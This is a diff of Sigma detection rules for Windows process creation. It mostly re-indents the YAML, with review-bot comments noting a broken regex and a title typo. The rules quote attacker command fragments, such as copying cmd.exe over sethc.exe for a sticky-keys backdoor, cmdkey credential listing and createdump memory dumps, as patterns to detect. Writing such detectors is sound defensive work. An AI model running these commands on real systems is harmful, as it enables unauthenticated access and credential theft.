@@ -1,8 +1,8 @@ title: Read Contents From Stdin Via Cmd.EXE id: 241e802a-b65e-484f-88cd-c2dc10f9206d related: - - id: 00a4bacd-6db4-46d5-9258-a7d5ebff4003 - type: obsoletes + - id: 00a4bacd-6db4-46d5-9258-a7d5ebff4003 + type: obsoletes status: test description: Detect the use of "<" to read and potentially execute a file via cmd.exe references:
@@ -22,10 +22,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_cmd: - - OriginalFileName: Cmd.Exe - - Image|endswith: \cmd.exe + - OriginalFileName: Cmd.Exe + - Image|endswith: \cmd.exe selection_cli: - CommandLine|contains: < + CommandLine|contains: < condition: process_creation and (all of selection_*) falsepositives: - Unknown
diff --git a/sigma/sysmon/process_creation/proc_creation_win_cmd_sticky_key_like_backdoor_execution.yml b/sigma/sysmon/process_creation/proc_creation_win_cmd_sticky_key_like_backdoor_execution.yml
index c1ced524d..7b8d9ae26 100644
--- a/sigma/sysmon/process_creation/proc_creation_win_cmd_sticky_key_like_backdoor_execution.yml
+++ b/sigma/sysmon/process_creation/proc_creation_win_cmd_sticky_key_like_backdoor_execution.yml
@@ -1,12 +1,10 @@ title: Sticky Key Like Backdoor Execution id: 2fdefcb3-dbda-401e-ae23-f0db027628bc related: - - id: baca5663-583c-45f9-b5dc-ea96a22ce542 - type: derived + - id: baca5663-583c-45f9-b5dc-ea96a22ce542 + type: derived status: test -description: Detects the usage and installation of a backdoor that uses an option - to register a malicious debugger for built-in tools that are accessible in the - login screen +description: Detects the usage and installation of a backdoor that uses an option to register a malicious debugger for built-in tools that are accessible in the login screen references: - https://learn.microsoft.com/en-us/archive/blogs/jonathantrull/detecting-sticky-key-backdoors author: Florian Roth (Nextron Systems), @twjackomo, Jonhnathan Ribeiro, oscd.community
@@ -38,7 +36,7 @@ detection: - \rundll32.exe - \wscript.exe - \wt.exe - CommandLine|contains: + CommandLine|contains: - sethc.exe - utilman.exe - osk.exe
diff --git a/sigma/sysmon/process_creation/proc_creation_win_cmd_sticky_keys_replace.yml b/sigma/sysmon/process_creation/proc_creation_win_cmd_sticky_keys_replace.yml
index c1d637145..f6ad21742 100644
--- a/sigma/sysmon/process_creation/proc_creation_win_cmd_sticky_keys_replace.yml
+++ b/sigma/sysmon/process_creation/proc_creation_win_cmd_sticky_keys_replace.yml
@@ -1,13 +1,9 @@ title: Persistence Via Sticky Key Backdoor id: 1070db9a-3e5d-412e-8e7b-7183b616e1b3 status: test -description: 'By replacing the sticky keys executable with the local admins CMD executable, - an attacker is able to access a privileged windows console session without authenticating - to the system. - +description: | + By replacing the sticky keys executable with the local admins CMD executable, an attacker is able to access a privileged windows console session without authenticating to the system. When the sticky keys are "activated" the privilleged shell is launched. - - ' references: - https://www.fireeye.com/blog/threat-research/2017/03/apt29_domain_frontin.html - https://www.clearskysec.com/wp-content/uploads/2020/02/ClearSky-Fox-Kitten-Campaign-v1.pdf
@@ -27,7 +23,7 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains|all: + CommandLine|contains|all: - 'copy ' - '/y ' - C:\windows\system32\cmd.exe C:\windows\system32\sethc.exe
diff --git a/sigma/sysmon/process_creation/proc_creation_win_cmdkey_adding_generic_creds.yml b/sigma/sysmon/process_creation/proc_creation_win_cmdkey_adding_generic_creds.yml
index 60531dc57..586bf5148 100644
--- a/sigma/sysmon/process_creation/proc_creation_win_cmdkey_adding_generic_creds.yml
+++ b/sigma/sysmon/process_creation/proc_creation_win_cmdkey_adding_generic_creds.yml
@@ -1,8 +1,7 @@ title: New Generic Credentials Added Via Cmdkey.EXE id: b1ec66c6-f4d1-4b5c-96dd-af28ccae7727 status: test -description: Detects usage of cmdkey to add generic credentials. As an example, this - has to be used before connecting to an RDP session via command line interface. +description: Detects usage of cmdkey to add generic credentials. As an example, this has to be used before connecting to an RDP session via command line interface. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1021.001/T1021.001.md#t1021001---remote-desktop-protocol author: frack113, Nasreddine Bencherchali (Nextron Systems)
@@ -19,10 +18,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \cmdkey.exe - - OriginalFileName: cmdkey.exe + - Image|endswith: \cmdkey.exe + - OriginalFileName: cmdkey.exe selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - ' /g' - ' /u' - ' /p'
diff --git a/sigma/sysmon/process_creation/proc_creation_win_cmdkey_recon.yml b/sigma/sysmon/process_creation/proc_creation_win_cmdkey_recon.yml
index 91bf1b40a..ccbfed558 100644
--- a/sigma/sysmon/process_creation/proc_creation_win_cmdkey_recon.yml
+++ b/sigma/sysmon/process_creation/proc_creation_win_cmdkey_recon.yml
@@ -6,8 +6,7 @@ references: - https://www.peew.pw/blog/2017/11/26/exploring-cmdkey-an-edge-case-for-privilege-escalation - https://technet.microsoft.com/en-us/library/cc754243(v=ws.11).aspx - https://github.com/redcanaryco/atomic-red-team/blob/b27a3cb25025161d49ac861cb216db68c46a3537/atomics/T1003.005/T1003.005.md#atomic-test-1---cached-credential-dump-via-cmdkey -author: jmallette, Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron - Systems) +author: jmallette, Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) date: 2019/01/16 modified: 2023/02/03 tags:
@@ -22,10 +21,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \cmdkey.exe - - OriginalFileName: cmdkey.exe + - Image|endswith: \cmdkey.exe + - OriginalFileName: cmdkey.exe selection_cli: - CommandLine|contains: + CommandLine|contains: - ' /l' - ' -l' condition: process_creation and (all of selection*)
diff --git a/sigma/sysmon/process_creation/proc_creation_win_cmstp_execution_by_creation.yml b/sigma/sysmon/process_creation/proc_creation_win_cmstp_execution_by_creation.yml
index e58e26a21..c1d429eda 100644
--- a/sigma/sysmon/process_creation/proc_creation_win_cmstp_execution_by_creation.yml
+++ b/sigma/sysmon/process_creation/proc_creation_win_cmstp_execution_by_creation.yml
@@ -1,8 +1,7 @@ title: CMSTP Execution Process Creation id: 7d4cdc5a-0076-40ca-aac8-f7e714570e47 status: stable -description: Detects various indicators of Microsoft Connection Manager Profile Installer - execution +description: Detects various indicators of Microsoft Connection Manager Profile Installer execution references: - https://web.archive.org/web/20190720093911/http://www.endurant.io/cmstp/detecting-cmstp-enabled-code-execution-and-uac-bypass-with-sysmon/ author: Nik Seetharaman
@@ -19,6 +18,7 @@ logsource: category: process_creation product: windows detection: + # CMSTP Spawning Child Process process_creation: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational
diff --git a/sigma/sysmon/process_creation/proc_creation_win_conhost_legacy_option.yml b/sigma/sysmon/process_creation/proc_creation_win_conhost_legacy_option.yml
index 19c625f54..45bd3e719 100644
--- a/sigma/sysmon/process_creation/proc_creation_win_conhost_legacy_option.yml
+++ b/sigma/sysmon/process_creation/proc_creation_win_conhost_legacy_option.yml
@@ -1,9 +1,7 @@ title: Suspicious High IntegrityLevel Conhost Legacy Option id: 3037d961-21e9-4732-b27a-637bcc7bf539 status: test -description: ForceV1 asks for information directly from the kernel space. Conhost - connects to the console application. High IntegrityLevel means the process is - running with elevated privileges, such as an Administrator context. +description: ForceV1 asks for information directly from the kernel space. Conhost connects to the console application. High IntegrityLevel means the process is running with elevated privileges, such as an Administrator context. references: - https://cybercryptosec.medium.com/covid-19-cyber-infection-c615ead7c29 - https://thedfirreport.com/2022/04/04/stolen-images-campaign-ends-in-conti-ransomware/
@@ -23,7 +21,7 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection: IntegrityLevel: High - CommandLine|contains|all: + CommandLine|contains|all: - conhost.exe - '0xffffffff' - -ForceV1
diff --git a/sigma/sysmon/process_creation/proc_creation_win_conhost_path_traversal.yml b/sigma/sysmon/process_creation/proc_creation_win_conhost_path_traversal.yml
index 4e694ba8c..d23223951 100644
--- a/sigma/sysmon/process_creation/proc_creation_win_conhost_path_traversal.yml
+++ b/sigma/sysmon/process_creation/proc_creation_win_conhost_path_traversal.yml
@@ -1,8 +1,7 @@ title: Conhost.exe CommandLine Path Traversal id: ee5e119b-1f75-4b34-add8-3be976961e39 status: test -description: detects the usage of path traversal in conhost.exe indicating possible - command/argument confusion/hijacking +description: detects the usage of path traversal in conhost.exe indicating possible command/argument confusion/hijacking references: - https://pentestlab.blog/2020/07/06/indirect-command-execution/ author: Nasreddine Bencherchali (Nextron Systems)
@@ -20,7 +19,7 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection: ParentCommandLine|contains: conhost - CommandLine|contains: /../../ + CommandLine|contains: /../../ condition: process_creation and selection falsepositives: - Unlikely
diff --git a/sigma/sysmon/process_creation/proc_creation_win_conhost_susp_child_process.yml b/sigma/sysmon/process_creation/proc_creation_win_conhost_susp_child_process.yml
index 4b9203a86..8dfff3357 100644
--- a/sigma/sysmon/process_creation/proc_creation_win_conhost_susp_child_process.yml
+++ b/sigma/sysmon/process_creation/proc_creation_win_conhost_susp_child_process.yml
@@ -1,8 +1,7 @@ title: Uncommon Child Process Of Conhost.EXE id: 7dc2dedd-7603-461a-bc13-15803d132355 status: experimental -description: Detects uncommon "conhost" child processes. This could be a sign of "conhost" - usage as a LOLBIN or potential process injection activity. +description: Detects uncommon "conhost" child processes. This could be a sign of "conhost" usage as a LOLBIN or potential process injection activity. references: - http://www.hexacorn.com/blog/2020/05/25/how-to-con-your-host/ author: omkar72
@@ -24,13 +23,12 @@ detection: filter_main_conhost: Image|endswith: :\Windows\System32\conhost.exe filter_main_null: - Image: null + Image: filter_main_empty: Image: '' filter_optional_provider: - Provider_Name: SystemTraceProvider-Process - condition: process_creation and (selection and not 1 of filter_main_* and not - 1 of filter_optional_*) + Provider_Name: SystemTraceProvider-Process # Race condition with SystemTrace doesn't provide all fields. + condition: process_creation and (selection and not 1 of filter_main_* and not 1 of filter_optional_*) falsepositives: - Unknown level: medium
diff --git a/sigma/sysmon/process_creation/proc_creation_win_conhost_uncommon_parent.yml b/sigma/sysmon/process_creation/proc_creation_win_conhost_uncommon_parent.yml
index 9639a39ca..33dc56ed3 100644
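Review bot: In filter_main_null the explicit `Image: null` becomes a bare `Image:`; both parse to a YAML null, but the bare form reads like an accidentally emptied entry right next to filter_main_empty's `Image: ''`, and the absent-versus-empty distinction appears to be the reason the two filters exist separately. Keeping `Image: null`, or adding `# field absent` after the bare key, keeps that intent visible to the next editor. The new comment on Provider_Name explaining the SystemTrace race condition is a good addition.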
--- a/sigma/sysmon/process_creation/proc_creation_win_conhost_uncommon_parent.yml
+++ b/sigma/sysmon/process_creation/proc_creation_win_conhost_uncommon_parent.yml
@@ -1,9 +1,7 @@ title: Conhost Spawned By Uncommon Parent Process id: cbb9e3d1-2386-4e59-912e-62f1484f7a89 status: experimental -description: Detects when the Console Window Host (conhost.exe) process is spawned - by an uncommon parent process, which could be indicative of potential code injection - activity. +description: Detects when the Console Window Host (conhost.exe) process is spawned by an uncommon parent process, which could be indicative of potential code injection activity. references: - https://www.elastic.co/guide/en/security/current/conhost-spawned-by-suspicious-parent-process.html author: Tim Rauch
@@ -24,6 +22,9 @@ detection: Image|endswith: \conhost.exe ParentImage|endswith: - \explorer.exe + # - '\csrss.exe' # Legitimate parent as seen in EchoTrail https://www.echotrail.io/insights/search/csrss.exe + # - '\ctfmon.exe' # Seen several times in a testing environment + # - '\dllhost.exe' # FP on clean system from grandparent 'svchost.exe -k DcomLaunch -p' - \lsass.exe - \regsvr32.exe - \rundll32.exe
@@ -32,6 +33,7 @@ detection: - \spoolsv.exe - \svchost.exe - \userinit.exe + # - '\wermgr.exe' # Legitimate parent as seen in EchoTrail https://www.echotrail.io/insights/search/wermgr.exe - \wininit.exe - \winlogon.exe filter_main_svchost:
@@ -50,8 +52,7 @@ detection: ParentCommandLine|contains: - C:\Program Files (x86)\Dropbox\Client\ - C:\Program Files\Dropbox\Client\ - condition: process_creation and (selection and not 1 of filter_main_* and not - 1 of filter_optional_*) + condition: process_creation and (selection and not 1 of filter_main_* and not 1 of filter_optional_*) falsepositives: - Unknown level: medium
diff --git a/sigma/sysmon/process_creation/proc_creation_win_control_panel_item.yml b/sigma/sysmon/process_creation/proc_creation_win_control_panel_item.yml
index aaaf6ed8b..bf60d8be9 100644
--- a/sigma/sysmon/process_creation/proc_creation_win_control_panel_item.yml
+++ b/sigma/sysmon/process_creation/proc_creation_win_control_panel_item.yml
@@ -22,26 +22,25 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_reg_img: - - Image|endswith: \reg.exe - - OriginalFileName: reg.exe + - Image|endswith: \reg.exe + - OriginalFileName: reg.exe selection_reg_cli: - CommandLine|contains|all: + CommandLine|contains|all: - add - CurrentVersion\Control Panel\CPLs selection_cpl: - CommandLine|endswith: .cpl + CommandLine|endswith: .cpl filter_cpl_sys: - CommandLine|contains: + CommandLine|contains: - \System32\ - '%System%' - '|C:\Windows\system32|' filter_cpl_igfx: - CommandLine|contains|all: + CommandLine|contains|all: - 'regsvr32 ' - ' /s ' - igfxCPL.cpl - condition: process_creation and (all of selection_reg_* or (selection_cpl and - not 1 of filter_cpl_*)) + condition: process_creation and (all of selection_reg_* or (selection_cpl and not 1 of filter_cpl_*)) falsepositives: - Unknown level: high
diff --git a/sigma/sysmon/process_creation/proc_creation_win_createdump_lolbin_execution.yml b/sigma/sysmon/process_creation/proc_creation_win_createdump_lolbin_execution.yml
index a773b0405..bba64e1cf 100644
--- a/sigma/sysmon/process_creation/proc_creation_win_createdump_lolbin_execution.yml
+++ b/sigma/sysmon/process_creation/proc_creation_win_createdump_lolbin_execution.yml
@@ -1,8 +1,8 @@ title: CreateDump Process Dump id: 515c8be5-e5df-4c5e-8f6d-a4a2f05e4b48 related: - - id: 1a1ed54a-2ba4-4221-94d5-01dee560d71e - type: similar + - id: 1a1ed54a-2ba4-4221-94d5-01dee560d71e + type: similar status: test description: Detects uses of the createdump.exe LOLOBIN utility to dump process memory references:
@@ -24,13 +24,13 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \createdump.exe - - OriginalFileName: FX_VER_INTERNALNAME_STR + - Image|endswith: \createdump.exe + - OriginalFileName: FX_VER_INTERNALNAME_STR selection_cli: - CommandLine|contains: - - ' -u ' + CommandLine|contains: + - ' -u ' # Short version of '--full' - ' --full ' - - ' -f ' + - ' -f ' # Short version of '--name' - ' --name ' - '.dmp ' condition: process_creation and (all of selection_*)
diff --git a/sigma/sysmon/process_creation/proc_creation_win_csc_susp_dynamic_compilation.yml b/sigma/sysmon/process_creation/proc_creation_win_csc_susp_dynamic_compilation.yml
index c235629b6..98f01c074 100644
--- a/sigma/sysmon/process_creation/proc_creation_win_csc_susp_dynamic_compilation.yml
+++ b/sigma/sysmon/process_creation/proc_creation_win_csc_susp_dynamic_compilation.yml
@@ -1,8 +1,7 @@ title: Dynamic .NET Compilation Via Csc.EXE id: dcaa3f04-70c3-427a-80b4-b870d73c94c4 status: test -description: Detects execution of "csc.exe" to compile .NET code. Attackers often - leverage this to compile code on the fly and use it in other stages. +description: Detects execution of "csc.exe" to compile .NET code. Attackers often leverage this to compile code on the fly and use it in other stages. references: - https://securityboulevard.com/2019/08/agent-tesla-evading-edr-by-removing-api-hooks/ - https://www.clearskysec.com/wp-content/uploads/2018/11/MuddyWater-Operations-in-Lebanon-and-Oman.pdf
@@ -26,47 +25,49 @@ detection: selection_img: Image|endswith: \csc.exe selection_susp_location_1: - CommandLine|contains: + CommandLine|contains: - :\Perflogs\ - :\Users\Public\ - - \AppData\Local\Temp\ + - \AppData\Local\Temp\ # User execution - \Temporary Internet - - \Windows\Temp\ + - \Windows\Temp\ # Admin execution selection_susp_location_2: - - CommandLine|contains|all: - - :\Users\ - - \Favorites\ - - CommandLine|contains|all: - - :\Users\ - - \Favourites\ - - CommandLine|contains|all: - - :\Users\ - - \Contacts\ - - CommandLine|contains|all: - - :\Users\ - - \Pictures\ + - CommandLine|contains|all: + - :\Users\ + - \Favorites\ + - CommandLine|contains|all: + - :\Users\ + - \Favourites\ + - CommandLine|contains|all: + - :\Users\ + - \Contacts\ + - CommandLine|contains|all: + - :\Users\ + - \Pictures\ selection_susp_location_3: - CommandLine|re: ([Pp]rogram[Dd]ata|%([Ll]ocal)?[Aa]pp[Dd]ata%|\\[Aa]pp[Dd]ata\\([Ll]ocal(Ll]ow)?|[Rr]oaming))\\[^\\]{1,256}$ + CommandLine|re: ([Pp]rogram[Dd]ata|%([Ll]ocal)?[Aa]pp[Dd]ata%|\\[Aa]pp[Dd]ata\\([Ll]ocal(Ll]ow)?|[Rr]oaming))\\[^\\]{1,256}$ filter_main_programfiles: + # Note: this is a generic filter. 
You could baseline execution in your env for a more robust rule ParentImage|startswith: - - C:\Program Files (x86)\ - - C:\Program Files\ + - C:\Program Files (x86)\ # https://twitter.com/gN3mes1s/status/1206874118282448897 + - C:\Program Files\ # https://twitter.com/gN3mes1s/status/1206874118282448897 filter_main_sdiagnhost: - ParentImage: C:\Windows\System32\sdiagnhost.exe + ParentImage: C:\Windows\System32\sdiagnhost.exe # https://twitter.com/gN3mes1s/status/1206874118282448897 filter_main_w3p: - ParentImage: C:\Windows\System32\inetsrv\w3wp.exe + ParentImage: C:\Windows\System32\inetsrv\w3wp.exe # https://twitter.com/gabriele_pippi/status/1206907900268072962 filter_optional_chocolatey: - ParentImage: C:\ProgramData\chocolatey\choco.exe + ParentImage: C:\ProgramData\chocolatey\choco.exe # Chocolatey https://chocolatey.org/ filter_optional_defender: - ParentCommandLine|contains: \ProgramData\Microsoft\Windows Defender Advanced - Threat Protection + ParentCommandLine|contains: \ProgramData\Microsoft\Windows Defender Advanced Threat Protection filter_optional_ansible: + # Note: As ansible is widely used we exclude it with this generic filter. 
+ # A better option would be to filter based on script content basis or other marker while hunting ParentCommandLine|contains: + # '{"failed":true,"msg":"Ansible requires PowerShell v3.0 or newer"}' - JwB7ACIAZgBhAGkAbABlAGQAIgA6AHQAcgB1AGUALAAiAG0AcwBnACIAOgAiAEEAbgBzAGkAYgBsAGUAIAByAGUAcQB1AGkAcgBlAHMAIABQAG8AdwBlAHIAUwBoAGUAbABsACAAdgAzAC4AMAAgAG8AcgAgAG4AZQB3AGUAcgAiAH0AJw - cAewAiAGYAYQBpAGwAZQBkACIAOgB0AHIAdQBlACwAIgBtAHMAZwAiADoAIgBBAG4AcwBpAGIAbABlACAAcgBlAHEAdQBpAHIAZQBzACAAUABvAHcAZQByAFMAaABlAGwAbAAgAHYAMwAuADAAIABvAHIAIABuAGUAdwBlAHIAIgB9ACcA - nAHsAIgBmAGEAaQBsAGUAZAAiADoAdAByAHUAZQAsACIAbQBzAGcAIgA6ACIAQQBuAHMAaQBiAGwAZQAgAHIAZQBxAHUAaQByAGUAcwAgAFAAbwB3AGUAcgBTAGgAZQBsAGwAIAB2ADMALgAwACAAbwByACAAbgBlAHcAZQByACIAfQAnA - condition: process_creation and (selection_img and 1 of selection_susp_location_* - and not 1 of filter_main_* and not 1 of filter_optional_*) + condition: process_creation and (selection_img and 1 of selection_susp_location_* and not 1 of filter_main_* and not 1 of filter_optional_*) falsepositives: - Legitimate software from program files - https://twitter.com/gN3mes1s/status/1206874118282448897 - Legitimate Microsoft software - https://twitter.com/gabriele_pippi/status/1206907900268072962 diff --git a/sigma/sysmon/process_creation/proc_creation_win_csc_susp_parent.yml b/sigma/sysmon/process_creation/proc_creation_win_csc_susp_parent.yml index 5d50e89a5..d1af2eae3 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_csc_susp_parent.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_csc_susp_parent.yml 
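Review bot: The regex in selection_susp_location_3, `\\[Aa]pp[Dd]ata\\([Ll]ocal(Ll]ow)?|[Rr]oaming)`, carries a malformed group `(Ll]ow)?` that this re-indent keeps unchanged: outside a character class `]` is a literal, so the optional group matches the literal text `Ll]ow` and a `\AppData\LocalLow\` path is never matched by that branch (assuming the line is rendered faithfully here and a `[` was not lost in extraction). The intended form is presumably `([Ll]ocal([Ll]ow)?|[Rr]oaming)`. The same regex is carried into selection_parent_susp_location of proc_creation_win_csc_susp_parent.yml in the last file section, whose hunk runs past the end of this excerpt.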
@@ -1,14 +1,12 @@ title: Csc.EXE Execution Form Potentially Suspicious Parent id: b730a276-6b63-41b8-bcf8-55930c8fc6ee status: test -description: Detects a potentially suspicious parent of "csc.exe", which could be - a sign of payload delivery. +description: Detects a potentially suspicious parent of "csc.exe", which could be a sign of payload delivery. references: - https://www.uptycs.com/blog/warzonerat-can-now-evade-with-process-hollowing - https://reaqta.com/2017/11/short-journey-darkvnc/ - https://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/yellow-liderc-ships-its-scripts-delivers-imaploader-malware.html -author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems), - X__Junior (Nextron Systems) +author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems), X__Junior (Nextron Systems) date: 2019/02/11 modified: 2023/10/27 tags: @@ -27,8 +25,8 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \csc.exe - - OriginalFileName: csc.exe + - Image|endswith: \csc.exe + - OriginalFileName: csc.exe selection_parent_generic: ParentImage|endswith: - \cscript.exe 
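Review bot: The title on the first context line of this hunk, `Csc.EXE Execution Form Potentially Suspicious Parent`, almost certainly has "Form" for "From", and the commit reflows the description right below it without correcting it. Suggest `title: Csc.EXE Execution From Potentially Suspicious Parent`. Rule titles are normally surfaced verbatim in alert output, so the typo would be repeated on every hit.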
@@ -47,44 +45,46 @@ detection: - '-Encoded ' - FromBase64String selection_parent_susp_location: - - ParentCommandLine|re: ([Pp]rogram[Dd]ata|%([Ll]ocal)?[Aa]pp[Dd]ata%|\\[Aa]pp[Dd]ata\\([Ll]ocal(Ll]ow)?|[Rr]oaming))\\[^\\]{1,256}$ - - ParentCommandLine|contains: - - :\PerfLogs\ - - :\Users\Public\ - - :\Windows\Temp\ - - \Temporary Internet - - ParentCommandLine|contains|all: - - :\Users\ - - \Favorites\ - - ParentCommandLine|contains|all: - - :\Users\ - - \Favourites\ - - ParentCommandLine|contains|all: - - :\Users\ - - \Contacts\ - - ParentCommandLine|contains|all: - - :\Users\ - - \Pictures\ + - ParentCommandLine|re: ([Pp]rogram[Dd]ata|%([Ll]ocal)?[Aa]pp[Dd]ata%|\\[Aa]pp[Dd]ata\\([Ll]ocal(Ll]ow)?|[Rr]oaming))\\[^\\]{1,256}$ + - ParentCommandLine|contains: + - :\PerfLogs\ + - :\Users\Public\ + - :\Windows\Temp\ + - \Temporary Internet + - ParentCommandLine|contains|all: + - :\Users\ + - \Favorites\ + - ParentCommandLine|contains|all: + - :\Users\ + - \Favourites\ + - ParentCommandLine|contains|all: + - :\Users\ + - \Contacts\ + - ParentCommandLine|contains|all: + - :\Users\ + - \Pictures\ filter_main_programfiles: + # Note: this is a generic filter. 
You could baseline execution in your env for a more robust rule ParentImage|startswith: - - C:\Program Files (x86)\ - - C:\Program Files\ + - C:\Program Files (x86)\ # https://twitter.com/gN3mes1s/status/1206874118282448897 + - C:\Program Files\ # https://twitter.com/gN3mes1s/status/1206874118282448897 filter_main_sdiagnhost: - ParentImage: C:\Windows\System32\sdiagnhost.exe + ParentImage: C:\Windows\System32\sdiagnhost.exe # https://twitter.com/gN3mes1s/status/1206874118282448897 filter_main_w3p: - ParentImage: C:\Windows\System32\inetsrv\w3wp.exe + ParentImage: C:\Windows\System32\inetsrv\w3wp.exe # https://twitter.com/gabriele_pippi/status/1206907900268072962 filter_optional_chocolatey: - ParentImage: C:\ProgramData\chocolatey\choco.exe + ParentImage: C:\ProgramData\chocolatey\choco.exe # Chocolatey https://chocolatey.org/ filter_optional_defender: - ParentCommandLine|contains: \ProgramData\Microsoft\Windows Defender Advanced - Threat Protection + ParentCommandLine|contains: \ProgramData\Microsoft\Windows Defender Advanced Threat Protection filter_optional_ansible: + # Note: As ansible is widely used we exclude it with this generic filter. 
+ # A better option would be to filter based on script content basis or other marker while hunting ParentCommandLine|contains: + # '{"failed":true,"msg":"Ansible requires PowerShell v3.0 or newer"}' - JwB7ACIAZgBhAGkAbABlAGQAIgA6AHQAcgB1AGUALAAiAG0AcwBnACIAOgAiAEEAbgBzAGkAYgBsAGUAIAByAGUAcQB1AGkAcgBlAHMAIABQAG8AdwBlAHIAUwBoAGUAbABsACAAdgAzAC4AMAAgAG8AcgAgAG4AZQB3AGUAcgAiAH0AJw - cAewAiAGYAYQBpAGwAZQBkACIAOgB0AHIAdQBlACwAIgBtAHMAZwAiADoAIgBBAG4AcwBpAGIAbABlACAAcgBlAHEAdQBpAHIAZQBzACAAUABvAHcAZQByAFMAaABlAGwAbAAgAHYAMwAuADAAIABvAHIAIABuAGUAdwBlAHIAIgB9ACcA - nAHsAIgBmAGEAaQBsAGUAZAAiADoAdAByAHUAZQAsACIAbQBzAGcAIgA6ACIAQQBuAHMAaQBiAGwAZQAgAHIAZQBxAHUAaQByAGUAcwAgAFAAbwB3AGUAcgBTAGgAZQBsAGwAIAB2ADMALgAwACAAbwByACAAbgBlAHcAZQByACIAfQAnA - condition: process_creation and (selection_img and 1 of selection_parent_* and - not 1 of filter_main_* and not 1 of filter_optional_*) + condition: process_creation and (selection_img and 1 of selection_parent_* and not 1 of filter_main_* and not 1 of filter_optional_*) falsepositives: - Unknown level: high diff --git a/sigma/sysmon/process_creation/proc_creation_win_csi_execution.yml b/sigma/sysmon/process_creation/proc_creation_win_csi_execution.yml index dc3398688..13410fe6b 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_csi_execution.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_csi_execution.yml 
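Review bot: The `ParentCommandLine|re` pattern in `selection_parent_susp_location` contains `([Ll]ocal(Ll]ow)?|[Rr]oaming)`, where the optional group is missing its opening `[`; as written it matches the literal text `Ll]ow`, so a parent command line under `\AppData\LocalLow\` never satisfies the first alternative. The commit only re-indents this line, so the defect is carried over unchanged; the intended pattern is presumably `\\[Aa]pp[Dd]ata\\([Ll]ocal([Ll]ow)?|[Rr]oaming))\\[^\\]{1,256}$`. The enclosing `detection:` block begins before this hunk, and the same pattern may be shared with sibling rules that are not visible here.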
@@ -1,11 +1,7 @@ title: Suspicious Csi.exe Usage id: 40b95d31-1afc-469e-8d34-9a3a667d058e status: test -description: "Csi.exe is a signed binary from Microsoft that comes with Visual Studio\ - \ and provides C# interactive capabilities. It can be used to run C# code from\ - \ a file passed as a parameter in command line. Early version of this utility\ - \ provided with Microsoft \u201CRoslyn\u201D Community Technology Preview was\ - \ named 'rcsi.exe'" +description: Csi.exe is a signed binary from Microsoft that comes with Visual Studio and provides C# interactive capabilities. It can be used to run C# code from a file passed as a parameter in command line. Early version of this utility provided with Microsoft “Roslyn” Community Technology Preview was named 'rcsi.exe' references: - https://lolbas-project.github.io/lolbas/OtherMSBinaries/Csi/ - https://lolbas-project.github.io/lolbas/OtherMSBinaries/Rcsi/ @@ -28,12 +24,12 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: - - \csi.exe - - \rcsi.exe - - OriginalFileName: - - csi.exe - - rcsi.exe + - Image|endswith: + - \csi.exe + - \rcsi.exe + - OriginalFileName: + - csi.exe + - rcsi.exe selection_cli: Company: Microsoft Corporation condition: process_creation and (all of selection*) diff --git a/sigma/sysmon/process_creation/proc_creation_win_csi_use_of_csharp_console.yml b/sigma/sysmon/process_creation/proc_creation_win_csi_use_of_csharp_console.yml index 9b9796a8e..8750ededd 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_csi_use_of_csharp_console.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_csi_use_of_csharp_console.yml 
@@ -27,7 +27,6 @@ detection: OriginalFileName: csi.exe condition: process_creation and selection falsepositives: - - Possible depending on environment. Pair with other factors such as net connections, - command-line args, etc. + - Possible depending on environment. Pair with other factors such as net connections, command-line args, etc. level: high ruletype: Sigma diff --git a/sigma/sysmon/process_creation/proc_creation_win_csvde_export.yml b/sigma/sysmon/process_creation/proc_creation_win_csvde_export.yml index c7a5595fd..c3e20dd84 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_csvde_export.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_csvde_export.yml @@ -1,8 +1,7 @@ title: Active Directory Structure Export Via Csvde.EXE id: e5d36acd-acb4-4c6f-a13f-9eb203d50099 status: experimental -description: Detects the execution of "csvde.exe" in order to export organizational - Active Directory structure. +description: Detects the execution of "csvde.exe" in order to export organizational Active Directory structure. references: - https://www.cybereason.com/blog/research/operation-ghostshell-novel-rat-targets-global-aerospace-and-telecoms-firms - https://web.archive.org/web/20180725233601/https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf @@ -20,12 +19,12 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \csvde.exe - - OriginalFileName: csvde.exe + - Image|endswith: \csvde.exe + - OriginalFileName: csvde.exe selection_remote: - CommandLine|contains: ' -f' + CommandLine|contains: ' -f' filter_import: - CommandLine|contains: ' -i' + CommandLine|contains: ' -i' condition: process_creation and (all of selection_* and not 1 of filter_*) falsepositives: - Unknown diff --git a/sigma/sysmon/process_creation/proc_creation_win_curl_cookie_hijacking.yml b/sigma/sysmon/process_creation/proc_creation_win_curl_cookie_hijacking.yml index fe8e1f3fb..af6a94a08 100644 
